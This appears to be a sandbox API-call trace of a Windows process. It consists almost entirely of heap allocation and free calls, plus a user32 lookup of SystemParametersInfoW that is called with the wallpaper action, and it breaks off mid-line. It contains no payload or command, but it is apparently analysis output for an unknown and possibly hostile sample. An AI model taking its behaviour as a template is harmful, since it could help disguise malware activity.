[0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0232.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0232.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0232.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0232.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0232.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0232.478] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0232.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0232.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0232.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0232.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0232.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0232.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0232.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0232.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0232.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0232.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0232.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0232.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0232.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0232.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0232.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0232.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0232.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0232.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0232.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0232.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0232.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0232.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0232.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0232.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0232.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0232.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0232.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0232.483] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0232.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0232.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0232.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0232.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ea0 [0232.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6ea0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0232.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0232.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0232.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0232.484] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0232.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0232.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0232.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0232.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0232.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0232.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0232.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0232.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0232.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0232.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0232.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0232.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0232.484] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0232.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865268 [0232.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0232.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0232.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0232.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0232.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0232.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0232.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0232.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0232.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0232.584] FreeLibrary (hLibModule=0x76240000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: 